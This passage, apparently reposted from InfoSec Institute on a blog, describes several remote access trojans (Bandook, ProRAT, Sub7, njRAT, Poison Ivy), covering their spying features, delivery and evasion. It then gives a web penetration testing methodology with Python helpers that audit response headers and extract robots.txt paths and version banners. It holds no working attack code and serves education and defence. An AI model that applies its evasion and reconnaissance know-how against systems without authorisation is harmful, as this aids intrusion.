<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/042414_0942_RemoteAcces1.png" src="http://resources.infosecinstitute.com/wp-content/uploads/042414_0942_RemoteAcces1.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
BO2K has a configuration interface that is used to set up the program’s functionality: the server file, the network protocol (TCP or UDP), the port number, the encryption mechanism, and the password/encryption key.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/042414_0942_RemoteAcces2.png" src="http://resources.infosecinstitute.com/wp-content/uploads/042414_0942_RemoteAcces2.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The BO2K client interface has a server list that displays the compromised servers, with each server’s name, IP address, and connection information. Several commands can be used to gather data from the victim machine; they are issued from the attacker’s machine with the intended parameters, and the responses are shown in the Server Response window.</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Bandook RAT</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Bandook RAT is capable of process injection, API unhooking, bypassing the Windows firewall, etc. Its client can extend the functionality of the server by sending plugin code to it. The server can hide itself by creating a process using the default browser settings.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Bandook was programmed in a combination of C++ and Delphi. It does not use any real cryptography to protect its traffic; it merely XORs the data. The server part is installed in the System32 folder on Windows, and on execution it establishes a connection to the attacker and listens for incoming connections on the specified port. The attacker can then execute the specified server commands on the victim’s machine. It has spying features such as a screen manager with screen clicks, a cam manager that supports systems with multiple cameras, a live keylogger, a cache reader, a screen recorder, etc.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The server component (28,200 bytes) is dropped into the Windows, System32 or Program Files/Applications folders; the default name is ali.exe. Once the server component runs, it establishes a connection to the attacking client, which listens for incoming connections on a configurable port, allowing the attacker to execute arbitrary code on the compromised computer.</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>ProRAT</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
ProRAT is a Remote Access Trojan with a client and server architecture. It operates by opening a port on the computer that allows the attacker to execute several commands on the victim’s machine. This RAT is capable of logging keystrokes, stealing passwords, taking screenshots, viewing the webcam, downloading and running files, etc.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
This RAT has features that allow it to remain undetected by antivirus and firewall software; it runs stealthily in the background. It can also disable and delete system restore points, remove security software, display error messages, etc.</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Sub7 RAT</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Sub7 RAT runs on the machine in an undetected and unauthorized manner. Sub7 worked on operating systems from Windows 9x through Windows XP. Sub7 has the same architecture as other RATs and allows an attacker to execute server-side commands and gain access and information.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
One of the distinguishing features of Sub7 RAT is its address book, which lets the attacker see whether the victim’s computer is online.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
On the client side the software had an “address book” that let the controller know when the target computers were online. Additionally, the server program could be customized before delivery by a so-called server editor. A major incident related to Sub7 was a hacker distributing an e-mail that tricked users into downloading the RAT, compromising their machines.</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>njRAT</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The remote access Trojan is thorough in its data-stealing capabilities. Beyond dropping a key logger, variants are capable of accessing a computer’s camera, stealing credentials stored in browsers, opening reverse shells, stealing files, manipulating processes and viewing the user’s desktop.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/042414_0942_RemoteAcces3.png" src="http://resources.infosecinstitute.com/wp-content/uploads/042414_0942_RemoteAcces3.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The malware is delivered via spear phishing emails, or drive-by <a href="http://resources.infosecinstitute.com/downloads/" style="color: rgb(51, 51, 51) !important; text-decoration: none;" title="downloads">downloads</a>. The attackers are also embedding the malware in other applications such as the L517 Word List Generator; the malware is compressed and obfuscated by a number of tools in order to avoid detection by security software.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Once a victim is infected, the malware is also capable of scanning for other machines on the same network looking for other vulnerable machines to infect. Using that ability to move once inside a network coupled with the legitimate credentials and other data it harvests via its key logging capabilities, njRAT is a classic APT-style attack tool.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The malware stores keystrokes in a .tmp file and connects to a control server over port 1177 registered to an IP address in Gaza City, Palestine. A copy of the malware is stored in a second directory built by the attacker in order for it to execute again upon reboots. Once it connects to the command and control server, it sends system information including the computer name, attacker identifier, system location, operating system information, whether the computer contains a built-in camera, and which windows are open.</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>PoisonIvy</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Poison Ivy is a remote access tool that includes features common to most Windows-based RATs: key logging, screen capturing, video capturing, file transfers, system administration, password theft, and traffic relaying.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The Poison Ivy builder kit allows attackers to customize and build their own PIVY server, which is delivered as mobile code to a target that has been compromised, typically using social engineering. Once the server executes on a compromised machine, it connects to a PIVY client installed on the attacker’s machine, giving the attacker control of the compromised system.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
In 2011, attackers used the RAT to compromise security firm RSA and steal data about its SecurID authentication system. The same year, PIVY also played a key role in the campaign known as Nitro, which targeted chemical makers, government agencies, defense contractors, and human rights groups. Just recently, PIVY was the payload of a zero-day exploit in Internet Explorer used in what is known as a “strategic web compromise” attack against visitors to a U.S. government website and a variety of others.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Poison Ivy communicates over TCP, and the traffic is encrypted with the Camellia cipher using a 256-bit key. The key is derived from a password chosen by the attacker when the PIVY server is built.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Many hacker groups have used Poison Ivy to attack different categories of targets across the world. These include a group called admin@338, which specializes in attacks targeting the financial services industry, and th3bug, which has focused on universities and healthcare facilities since 2009. The hacker group menuPass has run cyber-espionage attacks against defense contractors over the last four years.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/042414_0942_RemoteAcces4.png" src="http://resources.infosecinstitute.com/wp-content/uploads/042414_0942_RemoteAcces4.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>Organizational policy requirements for RAT</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Remote Administration Tools are a great help for IT work at the organizational level: staff in remote locations can access a computer and work as if they were on site. The following are the organizational-level policy requirements for using Remote Administration Tools.</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>All remote access tools that allow communication to and from the Internet must require multi-factor authentication.</li>
<li>The Remote Administration Tools authentication database source should be Active Directory (AD) or LDAP, and the authentication protocol must involve a challenge-response protocol.</li>
<li>Remote access tools must support the application layer proxy rather than direct connections through the perimeter firewall.</li>
<li>It should support strong, end-to-end encryption of the remote access communication channels as specified in the network encryption protocols policy.</li>
<li>All antivirus, data loss prevention, and other security systems must not be disabled, interfered with, or circumvented in any way.</li>
<li>Remote Administration Tools must be procured through the standard procurement process, and the IT group must approve the purchase.</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>Reference</strong></div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-left: 14pt;">
<li>http://www.matasano.com/research/PEST-CONTROL.pdf</li>
<li>http://cgi.di.uoa.gr/~ad/Publications/SPE-08.pdf</li>
<li>http://www.itnews.com/business-process-management/73683/5-alternatives-logmein-free-remote-pc-access?page=0,1&source=ITNEWSNLE_nlt_itndaily_2014-01-28</li>
<li>http://www.fidelissecurity.com/files/files/FTA_1009-njRAT_Uncovered_rev2.pdf</li>
<li>http://www.fireeye.com/resources/pdfs/fireeye-poison-ivy-report.pdf</li>
<li>http://www.ittoday.info/AIMS/DSM/84-02-02.pdf</li>
</ul>
<span style="color: #747474; font-family: PT Sans, Arial, Helvetica, sans-serif; font-size: x-small;"><span style="line-height: 20px;"><a href="http://resources.infosecinstitute.com/remote-access-tool/" target="_blank">http://resources.infosecinstitute.com/remote-access-tool/</a></span></span>Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-5427596336876071332014-04-28T21:32:00.003-07:002014-04-28T21:32:32.805-07:00[infosecinstitute] Step by Step Guide to Application Security Penetration Testing<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>Introduction</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
This document will guide you through penetration testing web applications step by step. We have followed OWASP (Open Web Application Security Project) and OSSTMM (Open Source Security Testing Methodology Manual) to construct this article.</div>
<a name='more'></a><br />
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>Objective</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The objective of this article is to help security analysts, penetration testers, developers and ethical hackers follow a step-by-step penetration testing process: discover a vulnerability, exploit it, and mitigate it.</div>
<h3 style="background-color: white; color: rgb(51, 51, 51) !important; font-family: 'Antic Slab', Arial, Helvetica, sans-serif !important; font-size: 16px !important; font-weight: normal; line-height: 24px !important;">
Web Application Penetration Testing</h3>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
A penetration test emulates the harm a malicious attacker could do while penetrating the application. It is a test of the people, systems and processes in place to detect, prevent, and respond to such attacks.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/042414_0940_StepbyStepG1.png" src="http://resources.infosecinstitute.com/wp-content/uploads/042414_0940_StepbyStepG1.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
A web application penetration test covers the vulnerabilities discovered through the information-gathering process, their exploitation (if applicable), and the level of access and success the penetration tester was able to achieve.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Below are the steps of the penetration testing process:</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Discover vulnerable systems using automated and manual vulnerability discovery.</li>
<li>Conduct real world attack simulation.</li>
<li>Mitigate threats and secure the platform.</li>
</ul>
<h3 style="background-color: white; color: rgb(51, 51, 51) !important; font-family: 'Antic Slab', Arial, Helvetica, sans-serif !important; font-size: 16px !important; font-weight: normal; line-height: 24px !important;">
Web Application Vulnerability Assessment</h3>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; padding-left: 30px;">
The Web Application Vulnerability Assessment does not include the exploitation phase. It contains the list of vulnerabilities, including the severity and the impact of the vulnerability on the application, along with the recommendations to resolve the same.<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/042414_0940_StepbyStepG2.jpg" src="http://resources.infosecinstitute.com/wp-content/uploads/042414_0940_StepbyStepG2.jpg" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<h3 style="background-color: white; color: rgb(51, 51, 51) !important; font-family: 'Antic Slab', Arial, Helvetica, sans-serif !important; font-size: 16px !important; font-weight: normal; line-height: 24px !important;">
Web Application Audit</h3>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
A Web Application Audit is a more in-depth view of the environment and processes, such as the backend server, database, secure code review, session management, authorization, and DMZ configuration.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/042414_0940_StepbyStepG3.jpg" src="http://resources.infosecinstitute.com/wp-content/uploads/042414_0940_StepbyStepG3.jpg" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
It contains all the aspects of web application penetration testing and vulnerability assessment, including the below four phases.</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Source Audit</li>
<li>Data Audit</li>
<li>Architecture Audit</li>
<li>Performance Audit</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Please refer to the diagram above for the classification of the four phases.</div>
<h3 style="background-color: white; color: rgb(51, 51, 51) !important; font-family: 'Antic Slab', Arial, Helvetica, sans-serif !important; font-size: 16px !important; font-weight: normal; line-height: 24px !important;">
Steps to start with the Test</h3>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
To start with the Web Application Audit, we need to follow the below steps:</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Scoping of the Application</li>
<li>Checking for static and dynamic pages</li>
<li>Documenting number of logins and role of the users</li>
<li>Information Gathering</li>
<li>Threat Profiling
<ul>
<li>Make a list of all possible threats.</li>
</ul>
</li>
<li>Comprehensive tests according to the created threat profile</li>
<li>Report
<ul>
<li>Report Creation</li>
<li>Internal Verification</li>
<li>Report Submission</li>
</ul>
</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The testing will be conducted in two phases.</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Automated Test
<ul>
<li>Using commercial tools available on the internet, e.g. Acunetix WVS, Netsparker.</li>
</ul>
</li>
<li>Manual Test
<ul>
<li>Using manual testing tools like Burp Suite and <a href="http://resources.infosecinstitute.com/owasp-zap/" style="color: rgb(51, 51, 51) !important; text-decoration: none;" title="OWASP ZAP">OWASP ZAP</a> Proxy</li>
<li>Burp Suite – Intruder, Repeater, Sequencer and Spider are used in the manual test.</li>
</ul>
</li>
</ul>
<h3 style="background-color: white; color: rgb(51, 51, 51) !important; font-family: 'Antic Slab', Arial, Helvetica, sans-serif !important; font-size: 16px !important; font-weight: normal; line-height: 24px !important;">
Approach to the Web Application Penetration Test</h3>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Passive Approach
<ul>
<li>Understand the logic of the application</li>
<li>Information Gathering</li>
<li>Understand all the access points of the application</li>
</ul>
</li>
<li>Active Approach
<ul>
<li>Configuration Management Testing
<ul>
<li>SSL/TLS Testing</li>
<li>Testing for file extensions</li>
<li>Old, backup and unreferenced files</li>
<li>Testing for HTTP methods</li>
</ul>
</li>
<li>Business Logic Testing
<ul>
<li>Testing for the business logic of the application</li>
<li>Testing for XSS</li>
<li>Testing for SQLi</li>
</ul>
</li>
<li>Authentication Testing
<ul>
<li>Credentials transported over an encrypted channel: check for SSL (HTTPS)</li>
<li>Testing for guessable user accounts</li>
<li>Brute force testing</li>
<li>Testing for bypassing the authentication schema</li>
<li>Testing for vulnerable remember-password and password-reset functions</li>
<li>Testing for logout and browser cache management</li>
<li>Testing for CAPTCHA</li>
<li>Testing multi-factor authentication</li>
</ul>
</li>
<li>Authorization Testing
<ul>
<li>Testing for bypassing the authorization schema</li>
<li>Testing for privilege escalation</li>
</ul>
</li>
<li>Session Management Testing
<ul>
<li>Testing for the session management schema</li>
<li>Testing for cookie attributes: HttpOnly, Secure and time validity</li>
<li>Testing for session fixation</li>
<li>Testing for CSRF</li>
</ul>
</li>
</ul>
</li>
</ul>
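<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Several items in the active approach above (cookie attributes, HTTP methods, credentials over an encrypted channel, logout and browser cache management) can be checked from a single captured HTTP response, which is what a tester sees in the Burp Suite or OWASP ZAP proxy history. The following is an added example of such a check, written for this page and not code from the article or from either tool. The response it audits is constructed, not captured from any site; the cookie-name hints used to recognise session cookies and the list of methods treated as risky are assumptions of the example.</div>

```python
"""Response-header checks for the authentication and session-management
items listed above (added example, not the article's or any tool's code).

It audits one captured HTTP response for: cookie attributes (Secure,
HttpOnly, lifetime), HTTP methods the server advertises, caching of
responses that carry a session cookie, transport protection (HSTS) and
server version disclosure. The response below is constructed.
"""

SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.22\r\n"
    "Set-Cookie: JSESSIONID=9f2c4a1b7e; Path=/\r\n"
    "Set-Cookie: remember_me=dXNlcjE=; Path=/; Expires=Wed, 28 Apr 2025 00:00:00 GMT\r\n"
    "Set-Cookie: lang=en; Path=/; Secure; HttpOnly\r\n"
    "Allow: GET, POST, PUT, DELETE, TRACE, OPTIONS\r\n"
    "Cache-Control: public, max-age=3600\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html>...</html>"
)

# Assumed heuristics: substrings that mark a cookie as session/auth related,
# and methods whose presence on a web app usually deserves a finding.
SESSION_NAME_HINTS = ("sess", "sid", "auth", "token", "remember")
RISKY_METHODS = {"PUT", "DELETE", "TRACE", "CONNECT"}


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status line, [(name, value)], body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def cookie_name(set_cookie):
    return set_cookie.split(";", 1)[0].split("=", 1)[0].strip()


def looks_like_session_cookie(name):
    return any(hint in name.lower() for hint in SESSION_NAME_HINTS)


def audit_cookie(set_cookie):
    """Issues for one Set-Cookie value; an empty list means the cookie is clean."""
    name = cookie_name(set_cookie)
    attrs = {}
    for part in set_cookie.split(";")[1:]:
        key, _, value = part.strip().partition("=")
        attrs[key.lower()] = value
    issues = []
    if "secure" not in attrs:
        issues.append(f"cookie {name}: missing Secure (sent over plain HTTP)")
    if "httponly" not in attrs:
        issues.append(f"cookie {name}: missing HttpOnly (readable by script)")
    # "time validity": a session-like cookie with Expires/Max-Age survives the
    # browser session and stays on disk; flag it for review.
    if looks_like_session_cookie(name) and ("expires" in attrs or "max-age" in attrs):
        issues.append(f"cookie {name}: session-like cookie persists past the browser session")
    return issues


def audit_response(raw):
    """All findings for one response, as human-readable strings."""
    _, headers, _ = parse_response(raw)
    names = {n for n, _ in headers}
    findings = []
    sets_session = False
    for name, value in headers:
        if name == "set-cookie":
            findings.extend(audit_cookie(value))
            sets_session |= looks_like_session_cookie(cookie_name(value))
        elif name == "allow":
            risky = sorted(RISKY_METHODS & {m.strip().upper() for m in value.split(",")})
            if risky:
                findings.append("risky HTTP methods advertised: " + ", ".join(risky))
        elif name == "server" and any(ch.isdigit() for ch in value):
            findings.append(f"Server header discloses version: {value}")
    if "strict-transport-security" not in names:
        findings.append("missing Strict-Transport-Security header")
    cache = dict(headers).get("cache-control", "")
    if sets_session and "no-store" not in cache.lower():
        findings.append("response that sets a session cookie is cacheable (no 'no-store')")
    return findings


if __name__ == "__main__":
    for finding in audit_response(SAMPLE_RESPONSE):
        print("-", finding)
```

<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
On the sample response the audit reports nine findings: both session-related cookies lack Secure and HttpOnly, the remember-me cookie is persistent, PUT, DELETE and TRACE are advertised, HSTS is absent, the page that issues the session cookie is cacheable, and the Server header leaks a version. The remember-me finding is intentionally a review item rather than a verdict, since such cookies are persistent by design and the question for the report is whether their lifetime and scope are justified.</div>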
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>The Scoping of the Application</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Once the penetration tester has the URL/IP address of the application, he will start working on the scoping of the application. It generally includes the following things.</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Gathering client requirements</li>
<li>Preparing a test plan</li>
<li>Profiling test boundaries</li>
<li>Defining business objectives</li>
<li>Nature and behavior of the application</li>
<li>Describe each factor that builds a practical roadmap towards test execution</li>
<li>Test constraints</li>
<li>Types of testing
<ul>
<li>White Box
<ul>
<li>Provided with complete knowledge of the application/server and database, along with the business logic of the application</li>
</ul>
</li>
<li>Gray Box
<ul>
<li>Provided with partial knowledge of the application/server</li>
<li>Privilege escalation may come under this</li>
</ul>
</li>
<li>Black Box
<ul>
<li>Zero-knowledge approach</li>
<li>The only thing provided to the penetration tester is the IP address/URL of the application</li>
<li>Needs extraordinary skills to exploit</li>
</ul>
</li>
</ul>
</li>
<li>Project management and scheduling</li>
<li>Limitations</li>
<li>Need of additional information</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>Check for the static and dynamic pages</strong></div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li><span style="text-decoration: underline;">Static page</span>: a page written in HTML whose content is the same every time it is requested.</li>
<li><span style="text-decoration: underline;">Dynamic page</span>: a functional page, generally connected to a database, whose content is generated on request. For example, a login page.</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>Documenting number of logins and role of the users</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
Once the penetration tester has an idea about the scoping, static and dynamic pages, he will move on to analyze the number of logins and the types of users that can login to the particular application. If he is already provided with the list of usernames and passwords, it is a case of white box testing. If not, it will come under black box testing.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
<strong>Information Gathering</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
In this phase, a penetration tester collects as much information as he can about the target.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
Below is the check list for information gathering.</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-left: 41pt;">
<li>Spider, Robots and Crawlers</li>
<li>Search Engine Discovery</li>
<li>Testing Web Application Fingerprint</li>
<li>Application Discovery</li>
<li>Analysis of Error Codes</li>
</ul>
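<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Two items on the checklist above, "Spider, Robots and Crawlers" and "Analysis of Error Codes", come down to reading what the site itself publishes: the paths its robots.txt asks crawlers to avoid, and the software banners its default error pages print. The following is an added example that extracts both, written for this page and not code from the article; it is as useful to a site owner checking what their own deployment discloses as to a tester. The robots.txt and 404 page are constructed inputs, www.example.com is a placeholder host, and the banner patterns are a small assumed list.</div>

```python
"""Information-gathering helpers for the "Spider, Robots and Crawlers" and
"Analysis of Error Codes" checklist items (added example, not the article's
code). Inputs are constructed; www.example.com is a placeholder.
"""
import re

ROBOTS_TXT = """\
# constructed sample robots.txt
User-agent: *
Disallow: /admin/
Disallow: /backup/
Disallow: /cgi-bin/
Allow: /public/
Sitemap: https://www.example.com/sitemap.xml
"""

ERROR_PAGE_404 = """<html><head><title>Apache Tomcat/7.0.42 - Error report</title></head>
<body><h1>HTTP Status 404 - /nonexistent</h1><hr/>
<p><b>type</b> Status report</p><h3>Apache Tomcat/7.0.42</h3></body></html>"""

# Assumed banner patterns as printed by common default error pages and
# Server headers; extend with whatever your own stack emits.
BANNER_PATTERNS = [
    re.compile(r"Apache Tomcat/[\d.]+"),
    re.compile(r"Apache/[\d.]+(?: \([^)]*\))?"),
    re.compile(r"nginx/[\d.]+"),
    re.compile(r"Microsoft-IIS/[\d.]+"),
    re.compile(r"PHP/[\d.]+"),
]


def parse_robots(robots_txt):
    """Return (disallowed paths, sitemap URLs) declared in robots.txt.

    A Disallow line keeps well-behaved crawlers out but also advertises the
    path to anyone who reads the file, so each entry is a candidate for
    "is this protected by authentication, or only by obscurity?".
    """
    disallowed, sitemaps = [], []
    for line in robots_txt.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments
        if not line or ":" not in line:
            continue
        field, value = (s.strip() for s in line.split(":", 1))
        field = field.lower()
        if field == "disallow" and value:
            disallowed.append(value)
        elif field == "sitemap" and value:
            sitemaps.append(value)
    return disallowed, sitemaps


def banners_in(text):
    """Distinct software/version strings leaked by a page or header block."""
    found = set()
    for pattern in BANNER_PATTERNS:
        found.update(pattern.findall(text))
    return sorted(found)


def gather(robots_txt, error_page):
    """Summarise what the site discloses to an unauthenticated visitor."""
    disallowed, sitemaps = parse_robots(robots_txt)
    return {
        "hidden_paths": disallowed,   # paths named in Disallow lines
        "sitemaps": sitemaps,         # extra URL inventories to spider
        "banners": banners_in(error_page),  # version strings for fingerprinting
    }


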